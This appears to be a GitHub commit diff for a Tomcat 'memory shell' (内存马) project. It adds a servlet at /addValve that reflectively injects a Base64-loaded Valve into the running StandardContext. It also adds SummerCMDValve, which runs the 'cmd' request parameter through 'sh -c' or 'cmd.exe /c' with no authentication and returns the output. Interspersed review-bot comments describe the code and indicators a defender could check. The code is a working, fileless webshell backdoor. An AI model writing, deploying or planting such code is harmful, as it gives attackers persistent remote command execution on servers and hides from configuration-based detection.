✨ Tomcat Valve 内存马
233Official committed Oct 23, 2024
1 parent 7097746 commit 0e5a575
Showing 6 changed files with 127 additions and 4 deletions.
Expand Up @@ -20,9 +20,9 @@ public static void DecodeBase64ToClassFile(String base64ClassString, String clas


public static void main(String[] args) {
String base64ClassString = "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";
String base64ClassString = "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";
// String classFileName = "DecodedlassFile.class";
String classFileName = "su18SpringInterceptor.class";
String classFileName = "su18TomcatValve.class";
DecodeBase64ToClassFile(base64ClassString, classFileName);
}
}
Expand Up @@ -7,7 +7,7 @@ public class ClassToBase64 {
public static void main(String[] args) {
try {
// 读取.class文件
File file = new File("resource/SummerInterceptorCMD.class");
File file = new File("resource/SummerCMDValve.class");
FileInputStream fis = new FileInputStream(file);
byte[] bytes = new byte[(int) file.length()];
fis.read(bytes);
Expand Up @@ -13,7 +13,13 @@
<!-- version-listener-0.3 尝试修改系统判断逻辑 -->
<!-- <version>listener-0.3</version> -->
<!-- version-listener-1.0 确定0.3版本的代码为可用代码,更新版本号为1.0 -->
<version>listener-1.0</version>
<!-- <version>listener-1.0</version> -->

<!-- Tomcat Valve 内存马 - 0.1 - su18 -->
<!-- <version>valve-0.1-su18-origin</version> -->
<!-- Tomcat Valve 内存马 - 0.2 - 注入恶意Valve -->
<version>valve-0.2-summer-cmd-valve</version>

<packaging>war</packaging>

<name>tomcat-servletapi-memshell Maven Webapp</name>
@@ -0,0 +1,63 @@
package com.summer233;

import org.apache.catalina.Valve;
import org.apache.catalina.core.StandardContext;

import javax.servlet.ServletContext;
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.lang.reflect.Field;

// import static com.summer233.DynamicUtils.VALVE_CLASS_STRING;
import static com.summer233.DynamicUtils.SUMMER_CMD_VALVE_CLASS_BASE64_STRING;

/**
* 访问这个 Servlet 将会动态添加自定义 Valve
* 测试版本 Tomcat 8.5.31
*
* @author su18,233
*/
@WebServlet(name = "AddTomcatValve", urlPatterns = "/addValve")
public class AddTomcatValve extends HttpServlet {

@Override
protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {

try {

// 从 request 中获取 servletContext
ServletContext servletContext = req.getServletContext();

// 如果已有此 servletName 的 Servlet,则不再重复添加
StandardContext o = null;

// 从 request 的 ServletContext 对象中循环判断获取 Tomcat StandardContext 对象
while (o == null) {
Field f = servletContext.getClass().getDeclaredField("context");
f.setAccessible(true);
Object object = f.get(servletContext);

if (object instanceof ServletContext) {
servletContext = (ServletContext) object;
} else if (object instanceof StandardContext) {
o = (StandardContext) object;
}
}

// 添加自定义 Valve
// o.addValve((Valve) DynamicUtils.getClass(VALVE_CLASS_STRING).newInstance());
o.addValve((Valve) DynamicUtils.getClass(SUMMER_CMD_VALVE_CLASS_BASE64_STRING).newInstance());

resp.getWriter().println("tomcat valve added");

} catch (Exception e) {
e.printStackTrace();
}

}

}
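Review bot: The comment above `StandardContext o = null;` says an existing component is not added a second time, but `doGet` never inspects the pipeline before `o.addValve(...)`, so each GET to `/addValve` appends one more instance of the Base64-loaded class; the comment should describe what the code does, e.g. `// no duplicate check: every request appends another valve instance`. The unwrap loop `while (o == null)` also has no exit when the reflected `context` field is neither a `ServletContext` nor a `StandardContext`, in which case it re-reads the same object indefinitely and holds the request thread. The `catch (Exception e) { e.printStackTrace(); }` block then hides any reflection failure behind an empty 200 response. For readers studying this sample defensively, the class Javadoc could add that the valve is registered only on the running context's pipeline and presumably has no entry in `server.xml` or `context.xml`, so it is found by comparing `getPipeline().getValves()` on the live context with the configured valves.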
Expand Up @@ -7,6 +7,7 @@

public class DynamicUtils {
public static String VALVE_CLASS_STRING = "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";
public static String SUMMER_CMD_VALVE_CLASS_BASE64_STRING = "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";

public static String BASIC_FILTER_CLASS_STRING_BASE64 = "yv66vgAAAEEANwoAAgADBwAEDAAFAAYBABBqYXZhL2xhbmcvT2JqZWN0AQAGPGluaXQ+AQADKClWCwAIAAkHAAoMAAsADAEAHWphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlAQAJZ2V0V3JpdGVyAQAXKClMamF2YS9pby9QcmludFdyaXRlcjsIAA4BABB0aGlzIGlzIGEgZmlsdGVyCgAQABEHABIMABMAFAEAE2phdmEvaW8vUHJpbnRXcml0ZXIBAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWCwAWABcHABgMABkAGgEAGWphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW4BAAhkb0ZpbHRlcgEAQChMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdDtMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2U7KVYHABwBABljb20vc3VtbWVyMjMzL0Jhc2ljRmlsdGVyBwAeAQAUamF2YXgvc2VydmxldC9GaWx0ZXIBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAG0xjb20vc3VtbWVyMjMzL0Jhc2ljRmlsdGVyOwEABGluaXQBAB8oTGphdmF4L3NlcnZsZXQvRmlsdGVyQ29uZmlnOylWAQAMZmlsdGVyQ29uZmlnAQAcTGphdmF4L3NlcnZsZXQvRmlsdGVyQ29uZmlnOwEAWyhMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdDtMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2U7TGphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW47KVYBAA5zZXJ2bGV0UmVxdWVzdAEAHkxqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXF1ZXN0OwEAD3NlcnZsZXRSZXNwb25zZQEAH0xqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXNwb25zZTsBAAtmaWx0ZXJDaGFpbgEAG0xqYXZheC9zZXJ2bGV0L0ZpbHRlckNoYWluOwEACkV4Y2VwdGlvbnMHADEBABNqYXZhL2lvL0lPRXhjZXB0aW9uBwAzAQAeamF2YXgvc2VydmxldC9TZXJ2bGV0RXhjZXB0aW9uAQAHZGVzdHJveQEAClNvdXJjZUZpbGUBABBCYXNpY0ZpbHRlci5qYXZhACEAGwACAAEAHQAAAAQAAQAFAAYAAQAfAAAAMwABAAEAAAAFKrcAAbEAAAACACAAAAAKAAIAAAAMAAQADQAhAAAADAABAAAABQAiACMAAAABACQAJQABAB8AAAA1AAAAAgAAAAGxAAAAAgAgAAAABgABAAAAEQAhAAAAFgACAAAAAQAiACMAAAAAAAEAJgAnAAEAAQAZACgAAgAfAAAAZAADAAQAAAAULLkABwEAEg22AA8tKyy5ABUDALEAAAACACAAAAAOAAMAAAAWAAsAFwATABgAIQAAACoABAAAABQAIgAjAAAAAAAUACkAKgABAAAAFAArACwAAgAAABQALQAuAAMALwAAAAYAAgAwADIAAQA0AAYAAQAfAAAAKwAAAAEAAAABsQAAAAIAIAAAAAYAAQAAABwAIQAAAAwAAQAAAAEAIgAjAAAAAQA1AAAAAgA2";
public static String BASIC_SEVLET_CLASS_STRING_BASE64 = "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";
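Review bot: `SUMMER_CMD_VALVE_CLASS_BASE64_STRING` is added as a mutable `public static String`, although `AddTomcatValve` passes its content to `DynamicUtils.getClass(...)` and instantiates the result; declaring it `public static final String` (as the neighbouring constants should be too) keeps other code in the webapp from replacing the bytes before they are loaded. The value is an opaque compiled class, so a reviewer cannot tell from this hunk what will run. A comment naming the source it was built from (apparently `SummerCMDValve.java`, encoded with `ClassToBase64`) and a digest of the `.class` file would make the blob checkable against the source in the same commit.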
@@ -0,0 +1,53 @@
package com.summer233;

import java.io.IOException;
import javax.servlet.ServletException;
import org.apache.catalina.connector.Request;
import org.apache.catalina.connector.Response;
import org.apache.catalina.valves.ValveBase;

import java.io.InputStream;
import java.io.PrintWriter;
import java.util.Scanner;

public class SummerCMDValve extends ValveBase {
public SummerCMDValve() {
}

public void invoke(Request request, Response response) throws IOException, ServletException {
try {
response.setContentType("text/html; charset=UTF-8");
response.setCharacterEncoding("UTF-8");
response.getWriter().println("Here is SummerCMDValve~<br>");

String cmd = request.getParameter("cmd");
if (cmd != null) {
boolean isLinux = true;
ProcessBuilder processBuilderOS = new ProcessBuilder("whoami");
Process processOS = processBuilderOS.start();
InputStream inOS = processOS.getInputStream();
try (Scanner scannerOS = new Scanner(inOS).useDelimiter("\\a")) {
String outputOS = scannerOS.hasNext() ? scannerOS.next() : "";
// 如果输出中包含 \ 则说明是Windows, 毕竟 Linux 用户没有域名, Windows 的 whoami 输出是 域名\用户名
if (outputOS.contains("\\")) {
isLinux = false;
}
}
String[] cmds = isLinux ? new String[] { "sh", "-c", cmd }
: new String[] { "cmd.exe", "/c", cmd };
InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
try (Scanner s = new Scanner(in).useDelimiter("\\a")) {
String output = s.hasNext() ? s.next() : "";
try (PrintWriter responseWriter = response.getWriter()) {
responseWriter.println(output);
responseWriter.flush();
}
}
}
} catch (Exception var5) {
var5.printStackTrace();
}

this.getNext().invoke(request, response);
}
}
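Review bot: `SummerCMDValve` carries no class or method documentation even though `invoke` passes the `cmd` request parameter unmodified to `sh -c` or `cmd.exe /c` for any request that reaches the pipeline, with no authentication or path check; a Javadoc block on the class should state exactly that, so the file is not mistaken for an ordinary valve. Two side effects visible in the code are worth recording in that Javadoc because they are what a defender would observe. First, `response.getWriter().println("Here is SummerCMDValve~<br>")` runs before the `cmd` check, so the banner is written into every response that passes through the valve. Second, each request carrying `cmd` makes the Tomcat JVM spawn `whoami` followed by a shell child process. The identifier `var5` and the empty constructor suggest the file was pasted from decompiler output, and a comment saying where it came from would help readers compare it with the Base64 constant in `DynamicUtils`.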
